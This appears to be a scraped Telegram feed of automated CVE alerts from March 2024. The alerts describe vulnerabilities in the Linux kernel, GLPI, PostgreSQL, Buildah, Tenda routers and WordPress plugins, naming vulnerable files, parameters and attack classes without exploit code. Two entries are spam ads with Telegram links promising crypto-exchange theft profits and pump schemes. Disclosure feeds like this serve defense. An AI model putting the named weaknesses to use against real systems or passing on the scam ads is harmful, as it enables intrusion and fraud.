🚨 CVE-2024-26586In the Linux kernel, the following vulnerability has been resolved:mlxsw: spectrum_acl_tcam: Fix stack corruptionWhen tc filters are first added to a net device, the corresponding localport gets bound to an ACL group in the device. The group contains a listof ACLs. In turn, each ACL points to a different TCAM region where thefilters are stored. During forwarding, the ACLs are sequentiallyevaluated until a match is found.One reason to place filters in different regions is when they are addedwith decreasing priorities and in an alternating order so that twoconsecutive filters can never fit in the same region because of theirkey usage.In Spectrum-2 and newer ASICs the firmware started to report that themaximum number of ACLs in a group is more than 16, but the layout of theregister that configures ACL groups (PAGT) was not updated to accountfor that. It is therefore possible to hit stack corruption [1] in therare case where more than 16 ACLs in a group are required.Fix by limiting the maximum ACL group size to the minimum between whatthe firmware reports and the maximum ACLs that fit in the PAGT register.Add a test case to make sure the machine does not crash when thiscondition is hit.[1]Kernel panic - not syncing: stack-protector: Kernel stack is corrupted in: mlxsw_sp_acl_tcam_group_update+0x116/0x120[...] dump_stack_lvl+0x36/0x50 panic+0x305/0x330 __stack_chk_fail+0x15/0x20 mlxsw_sp_acl_tcam_group_update+0x116/0x120 mlxsw_sp_acl_tcam_group_region_attach+0x69/0x110 mlxsw_sp_acl_tcam_vchunk_get+0x492/0xa20 mlxsw_sp_acl_tcam_ventry_add+0x25/0xe0 mlxsw_sp_acl_rule_add+0x47/0x240 mlxsw_sp_flower_replace+0x1a9/0x1d0 tc_setup_cb_add+0xdc/0x1c0 fl_hw_replace_filter+0x146/0x1f0 fl_change+0xc17/0x1360 tc_new_tfilter+0x472/0xb90 rtnetlink_rcv_msg+0x313/0x3b0 netlink_rcv_skb+0x58/0x100 netlink_unicast+0x244/0x390 netlink_sendmsg+0x1e4/0x440 ____sys_sendmsg+0x164/0x260 ___sys_sendmsg+0x9a/0xe0 __sys_sendmsg+0x7a/0xc0 do_syscall_64+0x40/0xe0 entry_SYSCALL_64_after_hwframe+0x63/0x6b🎖@cveNotify |
|
| 2024-03-18 18:37:26 |
🚨 CVE-2023-52451In the Linux kernel, the following vulnerability has been resolved:powerpc/pseries/memhp: Fix access beyond end of drmem arraydlpar_memory_remove_by_index() may access beyond the bounds of thedrmem lmb array when the LMB lookup fails to match an entry with thegiven DRC index. When the search fails, the cursor is left pointing to&drmem_info->lmbs[drmem_info->n_lmbs], which is one element past thelast valid entry in the array. The debug message at the end of thefunction then dereferences this pointer: pr_debug("Failed to hot-remove memory at %llx\n", lmb->base_addr);This was found by inspection and confirmed with KASAN: pseries-hotplug-mem: Attempting to hot-remove LMB, drc index 1234 ================================================================== BUG: KASAN: slab-out-of-bounds in dlpar_memory+0x298/0x1658 Read of size 8 at addr c000000364e97fd0 by task bash/949 dump_stack_lvl+0xa4/0xfc (unreliable) print_report+0x214/0x63c kasan_report+0x140/0x2e0 __asan_load8+0xa8/0xe0 dlpar_memory+0x298/0x1658 handle_dlpar_errorlog+0x130/0x1d0 dlpar_store+0x18c/0x3e0 kobj_attr_store+0x68/0xa0 sysfs_kf_write+0xc4/0x110 kernfs_fop_write_iter+0x26c/0x390 vfs_write+0x2d4/0x4e0 ksys_write+0xac/0x1a0 system_call_exception+0x268/0x530 system_call_vectored_common+0x15c/0x2ec Allocated by task 1: kasan_save_stack+0x48/0x80 kasan_set_track+0x34/0x50 kasan_save_alloc_info+0x34/0x50 __kasan_kmalloc+0xd0/0x120 __kmalloc+0x8c/0x320 kmalloc_array.constprop.0+0x48/0x5c drmem_init+0x2a0/0x41c do_one_initcall+0xe0/0x5c0 kernel_init_freeable+0x4ec/0x5a0 kernel_init+0x30/0x1e0 ret_from_kernel_user_thread+0x14/0x1c The buggy address belongs to the object at c000000364e80000 which belongs to the cache kmalloc-128k of size 131072 The buggy address is located 0 bytes to the right of allocated 98256-byte region [c000000364e80000, c000000364e97fd0) ================================================================== pseries-hotplug-mem: Failed to hot-remove memory at 0Log failed lookups with a separate message and dereference thecursor only when it points to a valid entry.🎖@cveNotify |
|
| 2024-03-18 18:37:25 |
🚨 CVE-2023-38509XWiki Platform is a generic wiki platform. In org.xwiki.platform:xwiki-platform-livetable-ui starting with version 3.5-milestone-1 and prior to versions 14.10.9 and 15.3-rc-1, the mail obfuscation configuration was not fully taken into account and is was still possible by obfuscated emails. This has been patched in XWiki 14.10.9 and XWiki 15.3-rc-1. A workaround is to modify the page `XWiki.LiveTableResultsMacros` following the patch.🎖@cveNotify |
|
| 2024-03-18 17:37:32 |
🚨 CVE-2024-27914GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. An unauthenticated user can provide a malicious link to a GLPI administrator in order to exploit a reflected XSS vulnerability. The XSS will only trigger if the administrator navigates through the debug bar. This issue has been patched in version 10.0.13.🎖@cveNotify |
|
| 2024-03-18 17:37:25 |
🚨 CVE-2024-27096GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. An authenticated user can exploit a SQL injection vulnerability in the search engine to extract data from the database. This issue has been patched in version 10.0.13.🎖@cveNotify |
|
| 2024-03-18 17:37:24 |
🚨 CVE-2024-0985Late privilege drop in REFRESH MATERIALIZED VIEW CONCURRENTLY in PostgreSQL allows an object creator to execute arbitrary SQL functions as the command issuer. The command intends to run SQL functions as the owner of the materialized view, enabling safe refresh of untrusted materialized views. The victim is a superuser or member of one of the attacker's roles. The attack requires luring the victim into running REFRESH MATERIALIZED VIEW CONCURRENTLY on the attacker's materialized view. As part of exploiting this vulnerability, the attacker creates functions that use CREATE RULE to convert the internally-built temporary table to a view. Versions before PostgreSQL 15.6, 14.11, 13.14, and 12.18 are affected. The only known exploit does not work in PostgreSQL 16 and later. For defense in depth, PostgreSQL 16.2 adds the protections that older branches are using to fix their vulnerability.🎖@cveNotify |
|
| 2024-03-18 16:37:38 |
🚨 CVE-2024-2050CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)vulnerability exists when an attacker injects then executes arbitrary malicious JavaScript codewithin the context of the product.🎖@cveNotify |
|
| 2024-03-18 16:37:31 |
🚨 CVE-2024-27930GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. An authenticated user can access sensitive fields data from items on which he has read access. This issue has been patched in version 10.0.13.🎖@cveNotify |
|
| 2024-03-18 16:37:30 |
🚨 CVE-2024-20755Bridge versions 13.0.5, 14.0.1 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-03-18 16:37:26 |
🚨 CVE-2024-1658The Grid Shortcodes WordPress plugin before 1.1.1 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2024-03-18 16:37:25 |
🚨 CVE-2024-1753A flaw was found in Buildah (and subsequently Podman Build)which allows containers to mount arbitrary locations on the host filesystem into build containers. A malicious Containerfile can use a dummy image with a symbolic link to the root filesystem as a mount source and cause the mount operation to mount the host root filesystem inside the RUN step. The commands inside the RUN step will then have read-write access to the host filesystem, allowing for full container escape at build time.🎖@cveNotify |
|
| 2024-03-18 13:37:26 |
🚨 CVE-2024-2496A NULL pointer dereference flaw was found in the udevConnectListAllInterfaces() function in libvirt. This issue can occur when detaching a host interface while at the same time collecting the list of interfaces via virConnectListAllInterfaces API. This flaw could be used to perform a denial of service attack by causing the libvirt daemon to crash.🎖@cveNotify |
|
| 2024-03-18 13:37:25 |
🚨 CVE-2023-7250A flaw was found in iperf, a utility for testing network performance using TCP, UDP, and SCTP. A malicious or malfunctioning client can send less than the expected amount of data to the iperf server, which can cause the server to hang indefinitely waiting for the remainder or until the connection gets closed. This will prevent other connections to the server, leading to a denial of service.🎖@cveNotify |
|
| 2024-03-18 13:07:33 |
🚨 CVE-2022-47036Siklu TG Terragraph devices before approximately 2.1.1 have a hardcoded root password that has been revealed via a brute force attack on an MD5 hash. It can be used for "debug login" by an admin. NOTE: the vulnerability is not fixed by the 2.1.1 firmware; instead, it is fixed in newer hardware, which would typically be used with firmware 2.1.1 or later.🎖@cveNotify |
|
| 2024-03-18 13:07:26 |
🚨 CVE-2024-2575A vulnerability, which was classified as critical, has been found in SourceCodester Employee Task Management System 1.0. Affected by this issue is some unknown functionality of the file /task-details.php. The manipulation of the argument task_id leads to authorization bypass. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-257078 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-18 13:07:25 |
🚨 CVE-2024-24230Komm.One CMS 10.4.2.14 has a Server-Side Template Injection (SSTI) vulnerability via the Velocity template engine. It allows remote attackers to execute arbitrary code via a URL that specifies java.lang.Runtime in conjunction with getRuntime().exec followed by an OS command.🎖@cveNotify |
|
| 2024-03-18 13:07:24 |
🚨 CVE-2023-52159A stack-based buffer overflow vulnerability in gross 0.9.3 through 1.x before 1.0.4 allows remote attackers to trigger a denial of service (grossd daemon crash) or potentially execute arbitrary code in grossd via crafted SMTP transaction parameters that cause an incorrect strncat for a log entry.🎖@cveNotify |
|
| 2024-03-18 12:37:24 |
🚨 CVE-2024-20767ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2024-03-18 10:37:33 |
🚨 CVE-2024-1606Lack of input sanitization in BMC Control-M branches 9.0.20 and 9.0.21 allows logged-in users for manipulation of generated web pages via injection of HTML code. This might lead to a successful phishing attack for example by tricking users into using a hyperlink pointing to a website controlled by an attacker.Fix for 9.0.20 branch was released in version 9.0.20.238. Fix for 9.0.21 branch was released in version 9.0.21.200.🎖@cveNotify |
|
| 2024-03-18 10:37:32 |
🚨 CVE-2024-1604Improper authorization in the report management and creation module of BMC Control-M branches 9.0.20 and 9.0.21 allows logged-in users to read and make unauthorized changes to any reports available within the application, even without proper permissions. The attacker must know the unique identifier of the report they want to manipulate.Fix for 9.0.20 branch was released in version 9.0.20.238. Fix for 9.0.21 branch was released in version 9.0.21.201.🎖@cveNotify |
|
| 2024-03-18 09:37:24 |
🚨 CVE-2024-28039Improper restriction of XML external entity references vulnerability exists in FitNesse all releases, which allows a remote unauthenticated attacker to obtain sensitive information, alter data, or cause a denial-of-service (DoS) condition.🎖@cveNotify |
|
| 2024-03-18 08:37:30 |
🚨 CVE-2024-28128Cross-site scripting vulnerability exists in FitNesse releases prior to 20220319, which may allow a remote unauthenticated attacker to execute an arbitrary script on the web browser of the user who is using the product and accessing a link with a specially crafted certain parameter.🎖@cveNotify |
|
| 2024-03-18 08:37:26 |
🚨 CVE-2024-27974Cross-site request forgery vulnerability in FUJIFILM printers which implement CentreWare Internet Services or Internet Services allows a remote unauthenticated attacker to alter user information. In the case the user is an administrator, the settings such as the administrator's ID, password, etc. may be altered. As for the details of affected product names, model numbers, and versions, refer to the information provided by the vendor listed under [References].🎖@cveNotify |
|
| 2024-03-18 08:37:25 |
🚨 CVE-2024-22475Cross-site request forgery vulnerability in multiple printers and scanners which implement Web Based Management provided by BROTHER INDUSTRIES, LTD. allows a remote unauthenticated attacker to perform unintended operations on the affected product. As for the details of affected product names, model numbers, and versions, refer to the information provided by the respective vendors listed under [References].🎖@cveNotify |
|
| 2024-03-18 02:37:26 |
🚨 CVE-2024-2576A vulnerability, which was classified as critical, was found in SourceCodester Employee Task Management System 1.0. This affects an unknown part of the file /update-admin.php. The manipulation of the argument admin_id leads to authorization bypass. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257079.🎖@cveNotify |
|
| 2024-03-18 02:37:25 |
🚨 CVE-2024-24230Komm.One CMS 10.4.2.14 has a Server-Side Template Injection (SSTI) vulnerability via the Velocity template engine. It allows remote attackers to execute arbitrary code via a URL that specifies java.lang.Runtime in conjunction with getRuntime().exec followed by an OS command.🎖@cveNotify |
|
| 2024-03-18 02:37:24 |
🚨 CVE-2023-52159A stack-based buffer overflow vulnerability in gross 0.9.3 through 1.x before 1.0.4 allows remote attackers to trigger a denial of service (grossd daemon crash) or potentially execute arbitrary code in grossd via crafted SMTP transaction parameters that cause an incorrect strncat for a log entry.🎖@cveNotify |
|
| 2024-03-18 02:07:35 |
🚨 CVE-2024-2572A vulnerability was found in SourceCodester Employee Task Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /task-details.php. The manipulation leads to execution after redirect. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257075.🎖@cveNotify |
|
| 2024-03-18 02:07:30 |
🚨 CVE-2023-40160Directory traversal vulnerability exists in Mailing List Search CGI (pmmls.exe) included in A.K.I Software's PMailServer/PMailServer2 products. If this vulnerability is exploited, a remote attacker may obtain arbitrary files on the server.🎖@cveNotify |
|
| 2024-03-18 02:07:29 |
🚨 CVE-2023-39223Stored cross-site scripting vulnerability exists in CGIs included in A.K.I Software's PMailServer/PMailServer2 products. If this vulnerability is exploited, an arbitrary script may be executed on a logged-in user's web browser.🎖@cveNotify |
|
| 2024-03-18 01:37:32 |
🚨 CVE-2023-39223Stored cross-site scripting vulnerability exists in CGIs included in A.K.I Software's PMailServer/PMailServer2 products. If this vulnerability is exploited, an arbitrary script may be executed on a logged-in user's web browser.🎖@cveNotify |
|
| 2024-03-18 01:37:25 |
🚨 CVE-2024-23138A maliciously crafted DWG file when parsed through Autodesk DWG TrueView can be used to cause a Stack-based Overflow. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process.🎖@cveNotify |
|
| 2024-03-18 01:37:24 |
🚨 CVE-2024-2568A vulnerability has been found in heyewei JFinalCMS 5.0.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/div_data/delete?divId=9 of the component Custom Data Page. The manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257071.🎖@cveNotify |
|
| 2024-03-18 00:37:32 |
🚨 CVE-2024-23131A maliciously crafted STP file in ASMKERN228A.dll or ASMDATAX228A.dll when parsed through Autodesk AutoCAD could lead to a memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.🎖@cveNotify |
|
| 2024-03-18 00:37:26 |
🚨 CVE-2024-23130A maliciously crafted SLDASM, or SLDPRT files in ODXSW_DLL.dll when parsed through Autodesk AutoCAD could lead to a memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.🎖@cveNotify |
|
| 2024-03-17 23:37:24 |
🚨 CVE-2024-2568A vulnerability has been found in heyewei JFinalCMS 5.0.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/div_data/delete?divId=9 of the component Custom Data Page. The manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257071.🎖@cveNotify |
|
| 2024-03-17 23:07:38 |
🚨 CVE-2024-2193A Speculative Race Condition (SRC) vulnerability that impacts modern CPU architectures supporting speculative execution (related to Spectre V1) has been disclosed. An unauthenticated attacker can exploit this vulnerability to disclose arbitrary data from the CPU using race conditions to access the speculative executable code paths.🎖@cveNotify |
|
| 2024-03-17 23:07:31 |
🚨 CVE-2023-7017Sciener locks' firmware update mechanism do not authenticate or validate firmware updates if passed to the lock through the Bluetooth Low Energy service. A challenge request can be sent to the lock with a command to prepare for an update, rather than an unlock request, allowing an attacker to compromise the device.🎖@cveNotify |
|
| 2024-03-17 23:07:30 |
🚨 CVE-2023-7009Some Sciener-based locks support plaintext message processing over Bluetooth Low Energy, allowing unencrypted malicious commands to be passed to the lock. These malicious commands, less then 16 bytes in length, will be processed by the lock as if they were encrypted communications. This can be further exploited by an attacker to compromise the lock's integrity.🎖@cveNotify |
|
| 2024-03-17 23:07:26 |
🚨 CVE-2023-7006The unlockKey character in a lock using Sciener firmware can be brute forced through repeated challenge requests, compromising the locks integrity.🎖@cveNotify |
|
| 2024-03-17 23:07:25 |
🚨 CVE-2023-6960TTLock App virtual keys and settings are only deleted client side, and if preserved, can access the lock after intended deletion.🎖@cveNotify |
|
| 2024-03-17 21:37:24 |
🚨 CVE-2024-2567** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as problematic, was found in jurecapuder AndroidWeatherApp 1.0.0 on Android. Affected is an unknown function of the file androidmanifest.xml of the component Backup File Handler. The manipulation leads to exposure of backup file to an unauthorized control sphere. It is possible to launch the attack on the physical device. The exploit has been disclosed to the public and may be used. VDB-257070 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: The code maintainer was contacted early about this disclosure but did not respond in any way. Instead the GitHub repository got deleted after a few days. We have to assume that the product is not supported anymore.🎖@cveNotify |
|
| 2024-03-17 17:37:30 |
🚨 CVE-2024-27961Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Codekraft AntiSpam for Contact Form 7 allows Reflected XSS.This issue affects AntiSpam for Contact Form 7: from n/a through 0.6.0.🎖@cveNotify |
|
| 2024-03-17 17:37:29 |
🚨 CVE-2024-27960Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in I Thirteen Web Solution Email Subscription Popup allows Stored XSS.This issue affects Email Subscription Popup: from n/a through 1.2.20.🎖@cveNotify |
|
| 2024-03-17 17:37:26 |
🚨 CVE-2024-27959Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Wpexpertsio WC Shop Sync – Integrate Square and WooCommerce for Seamless Shop Management allows Reflected XSS.This issue affects WC Shop Sync – Integrate Square and WooCommerce for Seamless Shop Management: from n/a through 4.2.9.🎖@cveNotify |
|
| 2024-03-17 17:37:25 |
🚨 CVE-2024-25903Exposure of Sensitive Information to an Unauthorized Actor vulnerability in N-Media Frontend File Manager.This issue affects Frontend File Manager: from n/a through 22.7.🎖@cveNotify |
|
| 2024-03-17 17:37:24 |
🚨 CVE-2024-25591Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Benjamin Rojas WP Editor.This issue affects WP Editor: from n/a through 1.2.7.🎖@cveNotify |
|
| 2024-03-17 16:37:25 |
🚨 CVE-2024-25933Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Pepro Dev. Group PeproDev Ultimate Invoice.This issue affects PeproDev Ultimate Invoice: from n/a through 1.9.7.🎖@cveNotify |
|
| 2024-03-17 16:37:24 |
🚨 CVE-2024-24867Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Osamaesh WP Visitor Statistics (Real Time Traffic).This issue affects WP Visitor Statistics (Real Time Traffic): from n/a through 6.9.4.🎖@cveNotify |
|
| 2024-03-17 15:37:25 |
🚨 CVE-2024-2566A vulnerability was found in Fujian Kelixin Communication Command and Dispatch Platform up to 20240313. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file api/client/get_extension_yl.php. The manipulation of the argument imei leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257065 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-17 15:37:24 |
🚨 CVE-2024-2565A vulnerability was found in PandaXGO PandaX up to 20240310. It has been classified as critical. Affected is an unknown function of the file /apps/system/router/upload.go of the component File Extension Handler. The manipulation of the argument file leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257064.🎖@cveNotify |
|
| 2024-03-17 14:37:24 |
🚨 CVE-2024-2564A vulnerability was found in PandaXGO PandaX up to 20240310 and classified as critical. This issue affects the function ExportUser of the file /apps/system/api/user.go. The manipulation of the argument filename leads to path traversal: '../filedir'. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257063.🎖@cveNotify |
|
| 2024-03-17 11:37:25 |
🚨 CVE-2024-2561A vulnerability, which was classified as critical, has been found in 74CMS 3.28.0. Affected by this issue is the function sendCompanyLogo of the file /controller/company/Index.php#sendCompanyLogo of the component Company Logo Handler. The manipulation of the argument imgBase64 leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257060.🎖@cveNotify |
|
| 2024-03-17 11:37:24 |
🚨 CVE-2024-2560A vulnerability classified as problematic was found in Tenda AC18 15.03.05.05. Affected by this vulnerability is the function fromSysToolRestoreSet of the file /goform/SysToolRestoreSet. The manipulation leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257059. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-17 10:37:24 |
🚨 CVE-2024-2559A vulnerability classified as problematic has been found in Tenda AC18 15.03.05.05. Affected is the function fromSysToolReboot of the file /goform/SysToolReboot. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-257058 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-17 09:37:25 |
🚨 CVE-2024-2558A vulnerability was found in Tenda AC18 15.03.05.05. It has been rated as critical. This issue affects the function formexeCommand of the file /goform/execCommand. The manipulation of the argument cmdinput leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257057 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-17 09:37:24 |
🚨 CVE-2024-2557A vulnerability was found in kishor-23 Food Waste Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/admin.php. The manipulation leads to improper authorization. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257056. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-17 08:37:24 |
🚨 CVE-2024-2556A vulnerability was found in SourceCodester Employee Task Management System 1.0. It has been classified as critical. This affects an unknown part of the file attendance-info.php. The manipulation of the argument user_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257055.🎖@cveNotify |
|
| 2024-03-17 07:37:24 |
🚨 CVE-2024-2555A vulnerability was found in SourceCodester Employee Task Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file update-admin.php. The manipulation of the argument admin_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-257054 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-17 05:27:29 |
❌ PRIVATE GROUP №1 ❌They are robbing Crypto Exchanges for Millions of dollars!Yesterday profit = 50,000$+👉 https://t.me/+BT9cWw0OJ644YWI1👉 https://t.me/+BT9cWw0OJ644YWI1👉 https://t.me/+BT9cWw0OJ644YWI1Go fast! Only the first 1000 subs will be accepted! 👀🚀 |
|
| 2024-03-17 04:37:24 |
🚨 CVE-2024-2547A vulnerability was found in Tenda AC18 15.03.05.05 and classified as critical. Affected by this issue is the function R7WebsSecurityHandler. The manipulation of the argument password leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257000. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-17 02:37:24 |
🚨 CVE-2024-2546A vulnerability has been found in Tenda AC18 15.13.07.09 and classified as critical. Affected by this vulnerability is the function fromSetWirelessRepeat. The manipulation of the argument wpapsk_crypto5g leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256999. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-17 01:37:24 |
🚨 CVE-2024-2535A vulnerability has been found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /admin/users.php. The manipulation of the argument id leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256972. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-17 00:37:24 |
🚨 CVE-2024-2534A vulnerability, which was classified as critical, was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. This affects an unknown part of the file /admin/users.php. The manipulation of the argument user_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256971. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-16 23:37:24 |
🚨 CVE-2024-2533A vulnerability, which was classified as problematic, has been found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. Affected by this issue is some unknown functionality of the file /admin/update-users.php. The manipulation of the argument id leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-256970 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-16 22:37:25 |
🚨 CVE-2024-2480A vulnerability classified as critical was found in MHA Sistemas arMHAzena 9.6.0.0. This vulnerability affects unknown code of the component Executa Page. The manipulation of the argument Companhia/Planta/Agente de/Agente até leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256888. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-16 22:37:24 |
🚨 CVE-2024-2479A vulnerability classified as problematic has been found in MHA Sistemas arMHAzena 9.6.0.0. This affects an unknown part of the component Cadastro Page. The manipulation of the argument Query leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256887. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-16 21:37:24 |
🚨 CVE-2024-2530A vulnerability was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /admin/update-rooms.php. The manipulation of the argument id leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256967. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-16 20:37:25 |
🚨 CVE-2024-2529A vulnerability was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/rooms.php. The manipulation leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-256966 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-16 20:37:24 |
🚨 CVE-2024-2528A vulnerability was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. It has been classified as critical. This affects an unknown part of the file /admin/update-rooms.php. The manipulation of the argument room_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256965 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-16 19:37:25 |
🚨 CVE-2024-2527A vulnerability was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/rooms.php. The manipulation of the argument room_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256964. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-16 19:37:24 |
🚨 CVE-2024-2526A vulnerability has been found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/rooms.php. The manipulation of the argument id leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256963. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-16 18:37:24 |
🚨 CVE-2024-2524A vulnerability, which was classified as critical, has been found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. This issue affects some unknown processing of the file /admin/receipt.php. The manipulation of the argument room_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256961 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-16 17:37:25 |
🚨 CVE-2024-2523A vulnerability classified as problematic was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. This vulnerability affects unknown code of the file /admin/booktime.php. The manipulation of the argument id leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256960. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-16 17:37:24 |
🚨 CVE-2024-2522A vulnerability classified as critical has been found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. This affects an unknown part of the file /admin/booktime.php. The manipulation of the argument room_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256959. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-16 15:30:59 |
ATTENTION!!+1000% coin will be posted in BINANCE WHALE'S LEAK🚀🚀Link open only for LIMITED TIME🕓JOIN FAST👀👇https://t.me/+rDT7H_njmis4ODQ0 |
|
| 2024-03-16 13:37:24 |
